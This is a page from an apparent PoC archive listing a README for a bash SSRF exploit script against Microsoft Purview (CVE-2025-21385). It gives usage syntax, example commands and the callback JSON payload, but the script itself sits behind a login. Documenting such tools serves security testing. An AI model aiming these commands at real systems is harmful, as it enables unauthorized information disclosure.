Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-21385 PoC — Microsoft Purview Information Disclosure Vulnerability

Source
Associated Vulnerability
Title: Microsoft Purview Information Disclosure Vulnerability (CVE-2025-21385)
Description:A Server-Side Request Forgery (SSRF) vulnerability in Microsoft Purview allows an authorized attacker to disclose information over a network.
Description
The SSRF vulnerability in Microsoft Purview
Readme
# SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**

## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.

## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)

## Usage

### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```

### Options
| Option             | Description                                      |
|--------------------|--------------------------------------------------|
| `-h`, `--help`     | Show the help menu.                             |
| `--exploit` `tu pu`| Perform the SSRF exploit with target and purview URLs. |

### Examples

#### Show Help Menu
```bash
./script.sh -h
```

Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```

#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```

Expected Output:
- If successful:
  ```
  SSRF exploit successful! Data retrieved:
  <response data>
  ```
- If unsuccessful:
  ```
  SSRF exploit failed! HTTP code: <code>
  ```

## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.

## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```

### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```

### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.

## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.

## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

## Contribution
Feel free to contribute by creating pull requests or reporting issues.

## License
[GNU GPL v3](LICENSE)

---

### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →